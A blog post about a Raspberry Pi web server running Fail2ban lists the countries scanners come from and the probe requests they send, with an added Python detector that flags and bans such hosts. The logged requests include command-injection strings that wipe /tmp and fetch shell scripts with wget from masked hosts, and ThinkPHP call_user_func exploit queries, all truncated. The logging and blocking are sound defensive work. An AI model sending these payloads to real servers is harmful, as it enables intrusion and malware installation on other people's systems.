Server

Script-kiddies 2018

by: webmaster [25-11-2018]

fail2ban.org

My Raspberry Pi web server is plagued by strange HTTP requests. They appear in tools used by 'script kiddies'.

I use Fail2ban, which reads server logs and blocks IP addresses.

Where does the 'evil' come from?

The top 10!

      Country               Percentage
  1.  China                 44.2%
  2.  United States         10.4%
  3.  Russian Federation    4.6%
  4.  Korea, Republic of    3.3%
  5.  Hong Kong             3.3%
  6.  Germany               2.5%
  7.  Italy                 2.5%
  8.  France                2.1%
  9.  Thailand              2.1%
 10.  Netherlands           2.1%

HTTP request
/.git/HEAD
//a2billing/customer/templates/default/footer.tpl
//phpMyAdmin/scripts/setup.php
//vtigercrm/vtigerservice.php
//wp-login.php
/10EA5B2B68D43CE0115002F4C0FD282A.php
/2phpmyadmin/scripts/setup.php
/HNAP1/
/MyAdmin/scripts/setup.php
/PHPMYADMIN/scripts/setup.php
/_query.php
/admin//config.php
/admin/newuser.php
/admin/phpmyadmin/index.php
/bea_wls_deployment_internal
/blog/wp-admin/
/ccvv
/cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64s[..]
/connectors/system/phpthumb.php
/db/scripts/setup.php
/db_cts.php
/db_pma.php
/dbadmin/scripts/setup.php
/demo/wp-admin/
/dev/wp-admin/
/help.php
/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func[..]
/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_a[..]
/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func[..]
/java.php
/jexinv4/jexinv4.jsp
/language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://x[..]
/license.php
/log.php
/login.cgi?cli=aa%20aa%27;wget%20http://xxx.xxx.xxx.xxx/dlink.sh%20-O%20-%3[..]
/login.cgi?cli=aa%20aa%27;wget%20http://xxx.xxx.xxx.xxx/izuku.sh%20-O%20-%3[..]
/login.cgi?cli=aa%20aa%27;wget%20http://xxx.xxx.xxx.xxx/t.php%27$
/login/
/logon.php
/maker/snwrite.cgi?mac=1234;wget%20http://xxx.xxx.xxx.xxx/airlink.sh%20-O%2[..]
/manager/html
/myadmin/scripts/setup.php
/mysql/admin/index.php?lang=en
/mysql/dbadmin/index.php?lang=en
/mysql/mysqlmanager/index.php?lang=en
/mysql/scripts/setup.php
/mysql/sqlmanager/index.php?lang=en
/mysqladmin/scripts/setup.php
/old/wp-admin/
/otsmobile/app/mgs/mgw.htm?operationType=com.cars.otsmobile.queryLeftTicket[..]
/pHpMyAdMiN/scripts/setup.php
/phpMyAdmin/config/config.inc.php
/phpMyAdmin/css/phpmyadmin.css.php
/phpMyAdmin/libraries/database_interface.lib.php
/phpMyAdmin/scripts/config.inc.php
/phpMyAdmin/scripts/db___.init.php
/phpMyAdmin/scripts/setup.php
/phpMyadmin/index.php?lang=en
/phpmyadmin/4.2/installing/
/phpmyadmin/config.inc.php
/phpmyadmin/config.user.inc.php
/phpmyadmin/config/config.inc.php
/phpmyadmin/config_inf.php
/phpmyadmin/index.php
/phpmyadmin/index.php?lang=en
/phpmyadmin/scripts/config.inc.php
/phpmyadmin/scripts/db___.init.php
/phpmyadmin/scripts/setup.php
/pma/scripts/setup.php
/public/index.php?s=/Index/%09hink%07pp/invokefunction&function=call_user_f[..]
/public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user[..]
/servlet?p=login&q=loginForm&jumpto=status
/test.php
/webdav/
/wordpress/wp-admin/
/wp-login.php
/wp-login.php?action=register
/wp/wp-admin/
/xmlrpc.php
http://xxx.xxx.xxx.xxx/echo.php
http://xxx.xxx.xxx.xxx:8518/d7ydbs5bsdhpc1ryl
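
The requests listed above, matched against access-log lines in the way a Fail2ban filter counts hits per host before banning. This is an added example, not part of the original post and not Fail2ban's own code. Assumptions: the log is in Common Log Format, the site itself serves none of these paths, the names is_probe and hosts_to_ban and the pattern grouping are hypothetical, the sample log lines and their documentation-range IP addresses are constructed, and Fail2ban's findtime window is left out.

```python
import re
from collections import Counter

# Patterns taken from the request list on this page, matched case-insensitively.
PROBE_PATTERNS = [
    r"^/+\.git/",                                # repository metadata
    r"/scripts/setup\.php$",                     # setup.php under any directory name
    r"/(phpmyadmin|pma|myadmin|mysql|dbadmin)/", # database admin paths
    r"/(wp-login\.php|wp-admin/|xmlrpc\.php)",   # WordPress paths
    r"invokefunction&function=call_user_func",   # the invokefunction queries
    r";wget(%20|\$\{IFS\})",                     # shell command appended to a parameter
    r"^/(HNAP1|manager/html|webdav)/?$",
    r"^https?://",                               # absolute-URI request target
]
PROBE_RE = re.compile("|".join(f"(?:{p})" for p in PROBE_PATTERNS), re.IGNORECASE)

# Common Log Format: host ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})')

# Constructed sample lines; the request targets are copied from the list above.
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Nov/2018:10:00:01 +0100] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 162',
    '192.0.2.10 - - [25/Nov/2018:10:00:02 +0100] "GET /pHpMyAdMiN/scripts/setup.php HTTP/1.1" 404 162',
    '192.0.2.10 - - [25/Nov/2018:10:00:03 +0100] "GET //wp-login.php HTTP/1.1" 404 162',
    '198.51.100.7 - - [25/Nov/2018:10:05:00 +0100] "GET /.git/HEAD HTTP/1.1" 404 162',
    '203.0.113.5 - - [25/Nov/2018:10:06:00 +0100] "GET /index.html HTTP/1.1" 200 5120',
    '203.0.113.5 - - [25/Nov/2018:10:06:01 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://xxx.xxx.xxx.xxx/t.php%27$ HTTP/1.1" 400 0',
]

def is_probe(target):
    """True when the request target matches one of the probe patterns."""
    return PROBE_RE.search(target) is not None

def hosts_to_ban(lines, maxretry=3):
    """Return hosts with at least maxretry probe requests, sorted."""
    hits = Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_probe(m.group("target")):
            hits[m.group("host")] += 1
    return sorted(h for h, n in hits.items() if n >= maxretry)

if __name__ == "__main__":
    print(hosts_to_ban(SAMPLE_LOG))
```

Lowering maxretry to 1 bans on the first probe, which is reasonable only when none of the matched paths exist on the server.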